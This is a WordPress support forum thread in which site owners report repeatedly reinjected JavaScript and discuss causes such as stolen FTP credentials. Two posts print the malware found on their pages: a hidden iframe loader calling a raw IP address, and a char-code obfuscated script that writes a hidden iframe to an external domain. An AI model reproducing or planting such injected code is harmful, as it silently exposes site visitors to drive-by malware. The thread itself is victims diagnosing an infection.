What theme are you using? Some themes do have security holes.
Thread Starter
itsnjm
(@itsnjm)
I am using tulip time theme [http://www.thesouthernhighlands.com.au/theme]
Will someone like to help us out here?? I am also getting the same problem. Same code is injected into one of my sites. I removed it earlier today but now its inserted again. I am going to ask my host to have everything checked but some help from WordPress will be really appreciated.
I am running a clean WP 2.5.1 installed and almost same set of plugins as given above.
Help Please.
Fastian, what plugins and theme are you using?
What the java-script is actual doing is the following:
var d=document;
if(!myia) {
d.write('
<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*152847)+'8102f33b7\' width=629 height=243 style=\'display: none\'>');
}
var myia=true;
This (russian?) server will give you another (more complicated) script, which purpose is not clear to me right now. Do not visit this site and do not run this java script!
Hey guys,
I’ve been hit with the same virus/hack. It was done on several of my sites including static and ecommerce sites. It’s not just a WP issue.
I noticed that none of my local files were infected. I would upload clean copies and like you said, the hack would re-appear. After a lot of research, I switched all my FTP accounts.. I destroyed all users, I recreated my host control panel passwords from a computer with a fresh install, and then recreated all my FTP users with really really strong passwords. IT WORKED.
I’ve got 3 computers at home, one of them is my web design biz machine, and I’m very suspicious that it’s been compromised. That’s how all my clients websites ended up with the virus.
I’m not using the that computer anymore, I’ve installed new updated virus definitions on my other computers and carefully transfered all work files. I plan to wipe my biz comp and start fresh.
This FTP hack can also be researched under “Iframe Hack”
Sometimes the best answers are the simplest. I was concerned at first that it was the host, but it happened to sites that I had a a variety of hosts.. FTP programs do not encrypt logins and passwords. If you’ve got a trojan chances are your ftp was logged.
Good Luck.
Cris
I get a similar problem and I have wordpress 2.7.1 installed and since yesterday my NOD32 reports a TrojanClicker.Iframe.NAO.gen
and I notice that in the generated HTML I get the last line like this:
<DIV id=main><script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje34EOje62EOje60EOje47EOje105EOje102EOje114EOje97EOje109EOje101EOje62";var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");var EBrElZthpSMlQNtLZBZV = "";for (var DRzVVdaXDXEHYwLKVFrL=1; DRzVVdaXDXEHYwLKVFrL<wyAIvMIOvBsdRDeECZxg.length; DRzVVdaXDXEHYwLKVFrL++){EBrElZthpSMlQNtLZBZV+=String.fromCharCode(wyAIvMIOvBsdRDeECZxg[DRzVVdaXDXEHYwLKVFrL]);}var FmdulWQzUMVHZPWHWyXp = ""+EBrElZthpSMlQNtLZBZV+"";document.write(""+FmdulWQzUMVHZPWHWyXp+"")</script>
Otherwise I see no changes and I was not doing any modification. I also tried to disable all plugin but there is no change. I did not find this code in any of the source files of main index or header or footer. How can I get rid of this?
Thanks in advance!
Peter